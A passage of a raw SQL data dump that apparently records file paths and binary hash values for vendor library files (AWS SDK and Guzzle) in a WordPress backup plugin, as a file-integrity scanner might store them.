T','wp-content/plugins/backwpup/vendor/aws/aws-sdk-php/src/Aws/Sts/Exception/InvalidParameterValueException.php',0,'m\r\0/','m\r\0/','4ϊ6CpH*	⁜\\@','',0,'?'),('$j)VmvMi','wp-content/plugins/backwpup/vendor/aws/aws-sdk-php/src/Aws/Sts/Exception/InvalidQueryParameterException.php',0,'~P!s','~P!s','I9O}+9+a5D?z}s\nٷ0','',0,'?'),('P6{SE$%8UB','wp-content/plugins/backwpup/vendor/aws/aws-sdk-php/src/Aws/Sts/Exception/MalformedPolicyDocumentException.php',0,'|.\r8MH)S','|.\r8MH)S','9~υmzJ:ZoCI','',0,'?'),('Smlm]','wp-content/plugins/backwpup/vendor/aws/aws-sdk-php/src/Aws/Sts/Exception/MalformedQueryStringException.php',0,'C{	c+\ZmN.','C{	c+\ZmN.','<N7Dq;Adt\'\r$v','',0,'?'),('o_`]ٝD','wp-content/plugins/backwpup/vendor/aws/aws-sdk-php/src/Aws/Sts/Exception/MissingActionException.php',0,'\rKoδ.','\rKoδ.','ĢqAl#qStPTG+ua','',0,'?'),('KT??dʢ','wp-content/plugins/backwpup/vendor/aws/aws-sdk-php/src/Aws/Sts/Exception/MissingAuthenticationTokenException.php',0,'z$\\\0}ޥMě','z$\\\0}ޥMě','T.m=gy(27<{!)','',0,'?'),('½OH\0|$L','wp-content/plugins/backwpup/vendor/aws/aws-sdk-php/src/Aws/Sts/Exception/MissingParameterException.php',0,'Km;<ci\\<|N','Km;<ci\\<|N','OWtf[sYֱwE{0kbLQ','',0,'?'),('߬*P\ZuЕr','wp-content/plugins/backwpup/vendor/aws/aws-sdk-php/src/Aws/Sts/Exception/OptInRequiredException.php',0,'Is9','Is9','cf*La5\ZykV.GCmE$','',0,'?'),('^}Lc5^Aa휪','wp-content/plugins/backwpup/vendor/aws/aws-sdk-php/src/Aws/Sts/Exception/PackedPolicyTooLargeException.php',0,'~hnP+~tϺ','~hnP+~tϺ',',U`\ZfBzZׇcx8w,','',0,'?'),(':A \':~/	vM','wp-content/plugins/backwpup/vendor/aws/aws-sdk-php/src/Aws/Sts/Exception/RequestExpiredException.php',0,'LjQW#9\\','LjQW#9\\','JIB,]~r݄{?.Ӊ(>','',0,'?'),('¥A~r\r2tY','wp-content/plugins/backwpup/vendor/aws/aws-sdk-php/src/Aws/Sts/Exception/ServiceUnavailableException.php',0,'^ȣEsQ2%D','^ȣEsQ2%D','$*Cމh!T柶ů','',0,'?'),(')lŸ$r0dX','wp-content/plugins/backwpup/vendor/aws/aws-sdk-php/src/Aws/Sts/Exception/StsException.php',0,'>E6ge','>E6ge','NpwD\0u!Ixs2N1P','',0,'?'),('K;h{m','wp-content/plugins/backwpup/vendor/aws/aws-sdk-php/src/Aws/Sts/Exception/ThrottlingException.php',0,'	I~,LXsI','	I~,LXsI','aoSq#|w$$%WObZ53','',0,'?'),('ni,\0T8s͆','wp-content/plugins/backwpup/vendor/aws/aws-sdk-php/src/Aws/Sts/Resources/sts-2011-06-15.php',0,'9s\Z/}\0 8','9s\Z/}\0 8','g9Ikp\0QO<ijIxf','',0,'?'),('!','wp-content/plugins/backwpup/vendor/aws/aws-sdk-php/src/Aws/Sts/StsClient.php',0,'	2a6Nkb','	2a6Nkb','}[O¢/7{\"{ GFq','',0,'?'),('@䎢CoϝRs','wp-content/plugins/backwpup/vendor/guzzle/guzzle/phar-stub.php',0,'WDKXa','WDKXa','vq$uBq2\Z/|PT','',0,'?'),('۞}E.C6tN','wp-content/plugins/backwpup/vendor/guzzle/guzzle/phing/tasks/ComposerLintTask.php',0,'%;],\'mJ#%','%;],\'mJ#%','D*/%AƛǃQ#,_','',0,'?'),('0ҏ.x+ͩ','wp-content/plugins/backwpup/vendor/guzzle/guzzle/phing/tasks/GuzzlePearPharPackageTask.php',0,'PSCH]WqsPP=','PSCH]WqsPP=','${=dWM;`n㟜?','',0,'?'),('0 }	\nU(d%','wp-content/plugins/backwpup/vendor/guzzle/guzzle/phing/tasks/GuzzleSubSplitTask.php',0,'$#ŒHC','$#ŒHC','@ˢm^\"iMAU87','',0,'?'),('qՔQXs','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Batch/AbstractBatchDecorator.php',0,'յk!&','յk!&','ⱉ¤	AgϚRX-\0','',0,'?'),('&%GR,HyvN','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Batch/Batch.php',0,',1@b9',',1@b9','$-GZ˵yǀ\n_BTQ(','',0,'?'),('HNBL177 ϡ','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Batch/BatchBuilder.php',0,'XEm3+O^[(u','XEm3+O^[(u','`5Hмʄ5d7h!Ca|\'!','',0,'?'),('tIBIKЛ.i!','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Batch/BatchClosureDivisor.php',0,'T]^P\0k	n','T]^P\0k	n',']3n˹0Zb-peW	','',0,'?'),('H\0.ᓩ*`','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Batch/BatchClosureTransfer.php',0,'CVsybo3`>j#','CVsybo3`>j#','wA/e{zwW&	1ogR]D','',0,'?'),('OU}(3','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Batch/BatchCommandTransfer.php',0,'q)XMԭ`@Fv','q)XMԭ`@Fv','V%9d6M5I','',0,'?'),('dÁ\"3E2(:*','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Batch/BatchDivisorInterface.php',0,'`?2K4t','`?2K4t','~a?oH3`])#)7N+_c','',0,'?'),('ԝ,z#','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Batch/BatchInterface.php',0,'\0#%','\0#%','\\6QX{:ֽ	aoZ\\B\ZeJA3','',0,'?'),('7\'\\/Sw','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Batch/BatchRequestTransfer.php',0,'qӨ\'=]','qӨ\'=]','q#6W۝\'	VCocઋܨm','',0,'?'),('kƊ6iEB','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Batch/BatchSizeDivisor.php',0,'(#hW_Ev[29!}','(#hW_Ev[29!}','σG/.drU꩜%8,D','',0,'?'),('A(\Z\Z/','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Batch/BatchTransferInterface.php',0,'.$E5s{m','.$E5s{m','ȲRk<[z?BP<PA8d]L`|','',0,'?'),('}&5CQIrK¿','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Batch/Exception/BatchTransferException.php',0,'?O$+dz\0\0','?O$+dz\0\0','cjevFwJߛR4G\"Fo','',0,'?'),('rt-<,XEO','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Batch/ExceptionBufferingBatch.php',0,'.ʹoCc*Yq','.ʹoCc*Yq','jb(^54k6\0EDl\r#\\2','',0,'?'),('\ZjiH','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Batch/FlushingBatch.php',0,'\nl)sc','\nl)sc','}De\'/\"XM/xx%kZۓX','',0,'?'),('Ic}W@ёM','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Batch/HistoryBatch.php',0,'bʼ:Qs','bʼ:Qs','M#%yߴenY=ՃaM','',0,'?'),('W?;yc','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Batch/NotifyingBatch.php',0,'ӑqhj!$:EB','ӑqhj!$:EB','})!Hs6s\'\nجu?aXK)1pf','',0,'?'),('JUB\"UUJ','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Cache/AbstractCacheAdapter.php',0,'ҙ[e9\rT','ҙ[e9\rT','+*[J}ShoJ=[<ٔAL','',0,'?'),('>јF[U@L','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Cache/CacheAdapterFactory.php',0,'CڥK*Z|4t','CڥK*Z|4t','ŃbF_asxq`8D!},-','',0,'?'),('Bm0Z2&R%','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Cache/CacheAdapterInterface.php',0,'j&y\"@tQ','j&y\"@tQ',';0Bc#jukIirR\"L93(','',0,'?'),('\Z<h','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Cache/ClosureCacheAdapter.php',0,'a|	XŤD5Su[~','a|	XŤD5Su[~','9zwL5{!?Y!	f','',0,'?'),('˵3~t?','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Cache/DoctrineCacheAdapter.php',0,'}RDjƻd@','}RDjƻd@','(t<MAˮ~?$ Кۘ\\2Y9','',0,'?'),('˚Sʯ3D','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Cache/NullCacheAdapter.php',0,'sB.QoWkG_','sB.QoWkG_','&殪T>Iecu?~:%%:h\Z','',0,'?'),(')\0:B5Wv֏','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Cache/Zf1CacheAdapter.php',0,'*I\\V:rd','*I\\V:rd','!78>vYY^9Nem4J@aܽ','',0,'?'),(']KM{','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Cache/Zf2CacheAdapter.php',0,'[&E\rR37Cg,','[&E\rR37Cg,','T\\`\ZWn/L n:Zfb$$Nv[','',0,'?'),('\'rr 4.j','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Common/AbstractHasDispatcher.php',0,'Ngb<g[','Ngb<g[','\Z#\'Ǔf\n	i=','',0,'?'),('{Q-MW ','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Common/Collection.php',0,'$HLj 	[','$HLj 	[','Y0u_[/PέWQ:','',0,'?'),('s65dYr','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Common/Event.php',0,'9%	(²','9%	(²','>jKfg]/fMU','',0,'?'),('G9VI~#','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Common/Exception/BadMethodCallException.php',0,' Mߌu.<',' Mߌu.<','ݴ߂0b}?\n SHBuL	\"','',0,'?'),('\\ò.R?U','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Common/Exception/ExceptionCollection.php',0,' 7o-&hR=',' 7o-&hR=','XY}öN\">C:%l*IgY','',0,'?'),('ciӈЁ=>i','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Common/Exception/GuzzleException.php',0,'tVLmm8b-{e','tVLmm8b-{e','W|FUhy	Tm\r','',0,'?'),('eP~b!8ھ%','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Common/Exception/InvalidArgumentException.php',0,'vFό:p&`','vFό:p&`','1FǛc%Lo]f+[zgy','',0,'?'),('.`]p9','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Common/Exception/RuntimeException.php',0,'P_:)q`{#','P_:)q`{#','ibN)֑Q)S#7.','',0,'?'),('2))$k-qn','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Common/Exception/UnexpectedValueException.php',0,'!3,S\'','!3,S\'','%:׶sFJp*kb_Fjׂ/L','',0,'?'),('-gVJsKa','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Common/FromConfigInterface.php',0,'>bY	PHV','>bY	PHV','c@$ 7ihkğ\ZVuI','',0,'?'),(']YɷA>=-R','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Common/HasDispatcherInterface.php',0,'ۨ0k~l<J4','ۨ0k~l<J4','~_vPGm, CT@*`QN','',0,'?'),('qAߴ`y','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Common/ToArrayInterface.php',0,'TfXO\'0x','TfXO\'0x','_al_	~9`r\'p','',0,'?'),('gx$H񢼃I.','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Common/Version.php',0,'\05;ZW','\05;ZW','!\n襗uv2}','',0,'?'),('?`1E','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/AbstractEntityBodyDecorator.php',0,'6Ԧ#hlܞs','6Ԧ#hlܞs','Y(zk\\ӎ̉1D~Dr$ցˎew','',0,'?'),('rnzSe','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/CachingEntityBody.php',0,'U\nfvQ_x%c','U\nfvQ_x%c','gdVW8H8-\0E<#{[?x\n','',0,'?'),('@2=Oɞ;','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Client.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-%5vF\0*','У!Vat 1j[x\\sBw','1669',0,'?'),('\n&{;W),3:A','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/ClientInterface.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@l7	3;5sS','ƒuHn@d]O$H4','',0,'?'),('Zp-N;h;','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Curl/CurlHandle.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ll8_6$-	Hg','\Z2*)OQkG̗*򍵥','',0,'?'),('F;<*Ga','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Curl/CurlMulti.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%xqZlZ<?s','	\n\0vuڗw>_iRav','',0,'?'),('IN0n5!\"a]<޼','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Curl/CurlMultiInterface.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u~i84YkC','%3	iF̥K\n\02$gsA^2,~','',0,'?'),('}	gwπ	\"','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Curl/CurlMultiProxy.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڊI_\rtW0','3LCŊ&Q\027,ރ\ZS]','',0,'?'),('?7C;*<','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Curl/CurlVersion.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xW }t]-','t6FŃ6a#T]>&r{8','',0,'?'),('(Oʷc`/\\','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Curl/RequestMediator.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rQlW$','k|zL\rٖ)PG URKE*j','',0,'?'),('3\0<lœ`R','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/EntityBody.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^}NYs}7','Y\Z_\\a?tbV','',0,'?'),('[	79s','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/EntityBodyInterface.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ɣ/\\m[~q)','X,7jDdv;ft','',0,'?'),('AHeaci2','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Exception/BadResponseException.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.5}ֲ&6j(~','~^jlS︐2<8nnIuz','',0,'?'),('E~^?5','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Exception/ClientErrorResponseException.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʰL@j\nn','bƦھuN2GuWtWE','',0,'?'),('V[鋋D','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Exception/CouldNotRewindStreamException.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\$tkW','ɥ\r k(\0>#\0Z:t]u%.','',0,'?'),(' }\\f%','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Exception/CurlException.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/OAIΗP','(,?Lxk3IHh]qW!','',0,'?'),('Y\Z#o-','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Exception/HttpException.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y\0leԄ1,}\r','dIޗ5K)7?OJ\"jU<K','',0,'?'),('7ܪQd9','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Exception/MultiTransferException.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r{_d]أ	To','\'%G2G0qlOLm`0G5\'','',0,'?'),('H\njL^M,]c','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Exception/RequestException.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}d	','ۇT&#JqN&ߔ\ZKGڂ*','',0,'?'),('!bX#LI3k\rf','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Exception/ServerErrorResponseException.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&!K<UZʛ','H?ٗKHwJ5>шa&y>','',0,'?'),('phwn','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Exception/TooManyRedirectsException.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sl','1䎰TݐV@~pVWΧR','',0,'?'),('C9}V\"','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/IoEmittingEntityBody.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D@<(xHm','{o\nLO/>e|r)Mqb\n!{\ZB','',0,'?'),('\nYub~M}h','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/AbstractMessage.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oSO','E8Ӛ%\0 %8\0_`mt','',0,'?'),('U?J>n-ױd','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/EntityEnclosingRequest.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Hޥ0i5','!WҪN\0֫(r88A3F4','',0,'?'),('\ZC\'ʈn1','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/EntityEnclosingRequestInterface.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tNJS8','piz1qaڪ&_;O','',0,'?'),('ά vC^X s','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/Header/CacheControl.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_.@ap','0f2F=d1RG7/E$Ǣ','',0,'?'),('Ч2m\ZbXe','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/Header/HeaderCollection.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RG0n\ny\nh','1Fi  8bsHľu1t_','',0,'?'),('4Q5\"Sl!!L','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/Header/HeaderFactory.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z4ۡ(g[','wkj.LT?=EUݛEm','',0,'?'),('qB}pJ','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/Header/HeaderFactoryInterface.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(Eɿ\'j+.T}','HٲyGy?-n g`a','',0,'?'),('_ƪA-Ӑhs','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/Header/HeaderInterface.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wq{:|e&M','f*K}-ݲ$Op*$\'PV','',0,'?'),('ﲰK','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/Header/Link.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\/]dCHo-','x[`ܧfGng.wW|0','',0,'?'),('(~E_q:}J','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/Header.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ஃLz*Bg','CԑV,b<pUl%g6','',0,'?'),('Jf\0ЀZz`=','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/MessageInterface.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k2bQ-?a','xr}`1\08>u6o:','',0,'?'),('uʥ׏xg	cwSA<','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/PostFile.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}9mZ','8ds~K}AHX%','',0,'?'),('_b?챈$^|j','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/PostFileInterface.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' &ʾ\0\"d','i8HL&<y<\0 C\0{H6nL','',0,'?'),('CT,tܱ`p','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/Request.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','æY-[~ ','+ǡ8ȖJ5r&+<@','',0,'?'),('_9,e:8','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/RequestFactory.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';7:ǐY\n,','-KT?-Ao-0A\Z{','',0,'?'),('s@\\]ǳ~','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/RequestFactoryInterface.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nhaw*','fk@ϱL1<0Qz3.%','',0,'?'),('\'Z`^+B)]Y','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/RequestInterface.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CǡhF.I`','1A\"kk%!D\\I,YJ','',0,'?'),('^_Q<%7s$','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Message/Response.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l	\'Cٽ','b4d1K\rQf׬lLHܓ','',0,'?'),('ZCt&E7Zco','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Mimetypes.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')o<Yb\\f','ε?4JcIX̉{̩AȔOy','',0,'?'),('9W\'|yEh\"9','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/QueryAggregator/CommaAggregator.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gjGm*fYE\\T','{ޞwn\0qɖ:w$\'WN+Q','',0,'?'),('ڜ⏟9{|N','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/QueryAggregator/DuplicateAggregator.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']/p=}qd	;','\0@do3*Dg㽅6ѴaMvsN','',0,'?'),('+F:tEzi','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/QueryAggregator/PhpAggregator.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&&4K','e=26dAu,#ܥxpri;','',0,'?'),('飺n]¸N%','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/QueryAggregator/QueryAggregatorInterface.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n\Zl-cNX\'*7','	\'e\'es{@^u\0','',0,'?'),('.6rViN-)','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/QueryString.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tTnJxx','!Y4#@ZJD~4_$','',0,'?'),('ϴ!4i','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/ReadLimitEntityBody.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s,sqԟ\0߭b?','aVlK~W9!!A\\4Og','',0,'?'),('gd?3Jh\r','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/RedirectPlugin.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2,E4lCA',':8\'Ii`7s0pL','',0,'?'),('@@3w١PDR6	9','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/StaticClient.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0_s7=Iǚ','y^$Jzz1!x\Z','',0,'?'),('qA_q%,','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Http/Url.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kNc*&bԏ9F','S#I\Z1MX_f^','',0,'?'),('RVje\n','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Inflection/Inflector.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	BPKS0','8nhT^}=\'EJP9|','',0,'?'),('༽C+H9zTV','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Inflection/InflectorInterface.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u3UGT>-','Mi\Z3+R}q1IA','',0,'?'),('P(K','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Inflection/MemoizingInflector.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	z).N<QWT','\\_ չbw#|.#E,;7Y','',0,'?'),('PQ`w\Z)tL','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Inflection/PreComputedInflector.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+~P3','7a?\'l}ƭ/a$^^','',0,'?'),('׃Q4Iy(aA','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Iterator/AppendIterator.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~#[hoD',']W7Ci&\'T};','',0,'?'),('2\n\rhp,`','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Iterator/ChunkedIterator.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~jmd','898`գ5i-I\Zj','',0,'?'),('Mp)h#8d','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Iterator/FilterIterator.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~\rUFb{iI˦','gr&[m\nxHsx\')9ʻ\"A|','',0,'?'),('Syd','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Iterator/MapIterator.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}(/D.OUtk(','96E >S#0bf3Y','',0,'?'),('1@ےf,_','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Iterator/MethodProxyIterator.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EW!\"`h2','IʩdϦ/a4Pu3\rn','',0,'?'),('`@}o޽','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Log/AbstractLogAdapter.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%r(Z2jvۿ','VutV_T|#=Yao_\01&','',0,'?'),('$wOBwR','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Log/ArrayLogAdapter.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|\\؏Ͷjh/4','*& ;~\"0Fܩjݬ\ZCMc ','',0,'?'),('N9z~91	ƚJt','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Log/ClosureLogAdapter.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yF_\0W7ψ','\0B1z4;V`V9&x','',0,'?'),('	-vhʵ','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Log/LogAdapterInterface.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gIz.FV:%','!G儱\0:JAQnZegop|G','',0,'?'),('r><V','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Log/MessageFormatter.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TM*c4E-\'a','^VĿLPp1Ye#C)','',0,'?'),('~AV/רR','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Log/MonologLogAdapter.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IpF߷o','4.I0!0yxr](FWJV','',0,'?'),('+:7ꁢI','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Log/PsrLogAdapter.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\Z+@D1','C<g:xU93Jۖ1\"D','',0,'?'),('?P=\0׮P9','wp-content/plugins/backwpup/vendor/guzzle/guzzle/src/Guzzle/Log/Zf1LogAdapter.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V_k\0yĴ','v,r4Wp4û*L}xFX/','',0,'?'),('1